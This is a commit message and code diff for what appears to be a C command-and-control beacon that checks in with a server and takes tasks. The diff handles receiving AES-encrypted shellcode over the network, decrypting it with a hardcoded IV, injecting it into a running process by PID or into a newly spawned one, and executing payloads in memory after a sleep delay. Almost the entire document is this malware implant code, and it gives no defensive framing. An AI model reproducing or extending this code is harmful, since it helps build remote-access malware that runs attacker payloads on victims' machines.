Added new beacon to repo. Fixed injection logic for new beacon.
@@ -76,17 +76,10 @@ void ReceiveResponse(Transport* transport) {
|
||||
|
||||
// Check-in with server
|
||||
void SendHeartbeat(Transport* transport) {
|
||||
char heartbeatMessage[64];
|
||||
snprintf(heartbeatMessage, sizeof(heartbeatMessage), "%s~HEARTBEAT", agentID);
|
||||
// printf("Preparing to send heartbeat: %s\n", heartbeatMessage);
|
||||
char heartbeat_message[32];
|
||||
snprintf(heartbeat_message, sizeof(heartbeat_message), "%s~HEARTBEAT", agentID);
|
||||
|
||||
if (!transport || !transport->handle || !transport->send) {
|
||||
fprintf(stderr, "Error: Invalid transport object (transport=%p, handle=%p, send=%p)\n",
|
||||
(void*)transport, transport ? transport->handle : NULL, transport ? (void*)transport->send : NULL);
|
||||
return;
|
||||
}
|
||||
|
||||
int sent = transport->send(transport->handle, heartbeatMessage, strlen(heartbeatMessage));
|
||||
int sent = transport->send(transport->handle, heartbeat_message, strlen(heartbeat_message));
|
||||
if (sent <= 0) {
|
||||
fprintf(stderr, "Error: Failed to send heartbeat, returned %d\n", sent);
|
||||
CleanupTransport(transport);
|
||||
|
||||
@@ -189,6 +189,7 @@ void SendSysInfo(char* result) {
|
||||
}
|
||||
#endif
|
||||
|
||||
// Differentiate between tasks
|
||||
void HandleTask(Transport* transport, char* taskID, char* task_type, char* task_args) {
|
||||
char result[STD_BUFF];
|
||||
|
||||
@@ -205,10 +206,10 @@ void HandleTask(Transport* transport, char* taskID, char* task_type, char* task_
|
||||
SendTaskResult(transport, "", result);
|
||||
}
|
||||
else if (strcmp(task_type, "run") == 0) {
|
||||
ReceiveModule(transport, task_args, task_args);
|
||||
ReceiveModule(result, transport, task_type, task_args);
|
||||
}
|
||||
else if (strcmp(task_type, "inject") == 0 || strcmp(task_type, "spawn") == 0) {
|
||||
ReceiveModule(transport, task_type, task_args);
|
||||
ReceiveModule(result, transport, task_type, task_args);
|
||||
}
|
||||
else if (strcmp(task_type, "files") == 0) {
|
||||
SendFiles(transport, NULL, 0);
|
||||
|
||||
@@ -7,6 +7,8 @@
|
||||
#include "config.h"
|
||||
#include "aes.c"
|
||||
|
||||
unsigned char iv[] = "sWDv47xwoMkg5gJY"; // 16 bytes
|
||||
|
||||
// Inject into running process
|
||||
void InjectRemote(char* key, DWORD targetPID, unsigned char* shellcode, SIZE_T payloadSize) {
|
||||
HANDLE hProcess = NULL;
|
||||
@@ -27,9 +29,6 @@ void InjectRemote(char* key, DWORD targetPID, unsigned char* shellcode, SIZE_T p
|
||||
goto cleanup;
|
||||
}
|
||||
|
||||
// Decrypt the shellcode before injecting
|
||||
unsigned char iv[] = "sWDv47xwoMkg5gJY"; // 16 bytes
|
||||
|
||||
// Decrypt locally using tiny-AES-c
|
||||
struct AES_ctx ctx;
|
||||
AES_init_ctx_iv(&ctx, key, iv);
|
||||
@@ -172,9 +171,6 @@ void SpawnNew(char* key, char* path, unsigned char* shellcode, int payloadSize,
|
||||
}
|
||||
printf("Memory allocation successful");
|
||||
|
||||
// Decrypt the shellcode before injecting
|
||||
unsigned char iv[] = "sWDv47xwoMkg5gJY"; // 16 bytes
|
||||
|
||||
// Decrypt locally using tiny-AES-c
|
||||
struct AES_ctx ctx;
|
||||
AES_init_ctx_iv(&ctx, key, iv);
|
||||
@@ -221,7 +217,7 @@ cleanup:
|
||||
if (pinfo.hThread) CloseHandle(pinfo.hThread);
|
||||
}
|
||||
|
||||
void ExecuteInMemory(unsigned char* encryptedPayload, int payloadSize, int sleepTime) {
|
||||
void ExecuteInMemory(char* key, unsigned char* encryptedPayload, int payloadSize, int sleepTime) {
|
||||
printf("Payload size: %d\n", payloadSize);
|
||||
|
||||
if (sleepTime <= 0) sleepTime = 3600;
|
||||
@@ -234,14 +230,11 @@ void ExecuteInMemory(unsigned char* encryptedPayload, int payloadSize, int sleep
|
||||
memcpy(allocated_mem, encryptedPayload, payloadSize);
|
||||
Sleep(sleepTime / 2);
|
||||
|
||||
// dummy
|
||||
char key = "qwe";
|
||||
char iv = "qwe";
|
||||
|
||||
// Decrypt in-place using tiny-AES
|
||||
struct AES_ctx ctx;
|
||||
AES_init_ctx_iv(&ctx, key, iv);
|
||||
AES_CTR_xcrypt_buffer(&ctx, (byte*)allocated_mem, payloadSize);
|
||||
memset(key, 0, 16);
|
||||
|
||||
printf("Decrypted payload (first 32 bytes):\n");
|
||||
for (int i = 0; i < 32 && i < payloadSize; i++) {
|
||||
@@ -306,16 +299,19 @@ void RunEXEFromDisk(char* exePath, Transport* transport) {
|
||||
SendTaskResult(transport, "", "Process executed successfully\n");
|
||||
}
|
||||
|
||||
void ReceiveModule(Transport* transport, char* taskType, char* taskArgs) {
|
||||
// Receive payload over network
|
||||
void ReceiveModule(char* result, Transport* transport, char* taskType, char* taskArgs) {
|
||||
char* key = strtok(taskArgs, "~");
|
||||
char* taskArg1 = strtok(NULL, "~");
|
||||
char* taskArg2 = strtok(NULL, "~");
|
||||
char* sizeBuf = strtok(NULL, "");
|
||||
// Example message
|
||||
// TASK~spawn~bin~C:\Windows\system32\notepad.exe~9084~1201774
|
||||
printf("Task type: %s\n", taskType);
|
||||
printf("Key: %s\n", key);
|
||||
printf("Argument 1: %s\n", taskArg1);
|
||||
printf("Argument 2: %s\n", taskArg2);
|
||||
printf("Size buf: %s\n", sizeBuf);
|
||||
|
||||
// Parse payload size based on type of command
|
||||
int payloadSize;
|
||||
@@ -358,62 +354,7 @@ void ReceiveModule(Transport* transport, char* taskType, char* taskArgs) {
|
||||
}
|
||||
printf("Received full module of size: %d bytes\n", bytesReceived);
|
||||
|
||||
// Process exe and dll files (write to disk first)
|
||||
// if (strcmp(payloadType, "exe") == 0 || strcmp(payloadType, "dll") == 0) {
|
||||
// // Decrypt before writing to disk
|
||||
// struct AES_ctx ctx;
|
||||
// AES_init_ctx_iv(&ctx, key, iv);
|
||||
// AES_CTR_xcrypt_buffer(&ctx, payloadBuffer, payloadSize);
|
||||
|
||||
// printf("Decrypted payload (first 32 bytes):\n");
|
||||
// for (int i = 0; i < 32 && i < payloadSize; i++) {
|
||||
// printf("%02x ", payloadBuffer[i]);
|
||||
// if ((i + 1) % 16 == 0) printf("\n");
|
||||
// }
|
||||
// printf("\n");
|
||||
if (0) {
|
||||
|
||||
}
|
||||
// char fileName[32];
|
||||
// if (strcmp(payloadType, "exe") == 0) {
|
||||
// sprintf(fileName, "module.exe");
|
||||
// }
|
||||
// else if (strcmp(payloadType, "dll") == 0) {
|
||||
// sprintf(fileName, "module.dll");
|
||||
// }
|
||||
// else if (strcmp(payloadType, "bin") == 0) {
|
||||
// printf("Shellcode detected\n");
|
||||
// }
|
||||
// else {
|
||||
// printf("Unsupported payload type: %s\n", payloadType);
|
||||
// memset(payloadBuffer, 0, payloadSize);
|
||||
// return;
|
||||
// }
|
||||
|
||||
// FILE* file = fopen(fileName, "wb");
|
||||
// if (!file) {
|
||||
// printf("Failed to open file for writing: %s\n", fileName);
|
||||
// memset(payloadBuffer, 0, payloadSize);
|
||||
// return;
|
||||
// }
|
||||
// size_t written = fwrite(payloadBuffer, 1, payloadSize, file);
|
||||
// if (written != payloadSize) {
|
||||
// printf("Error writing data to file: %s\n", fileName);
|
||||
// memset(payloadBuffer, 0, payloadSize);
|
||||
// fclose(file);
|
||||
// return;
|
||||
// }
|
||||
// fclose(file);
|
||||
// printf("Module data written to: %s\n", fileName);
|
||||
|
||||
// if (strcmp(payloadType, "exe") == 0) {
|
||||
// RunEXEFromDisk(fileName, transport);
|
||||
// }
|
||||
// else if (strcmp(payloadType, "dll") == 0) {
|
||||
// RunDLLFromDisk(fileName, "ExecuteModule", transport);
|
||||
// }
|
||||
|
||||
else if (strcmp(taskType, "inject") == 0) {
|
||||
if (strcmp(taskType, "inject") == 0) {
|
||||
int pid = atoi(taskArg1);
|
||||
InjectRemote(key, pid, payloadBuffer, payloadSize);
|
||||
}
|
||||
|
||||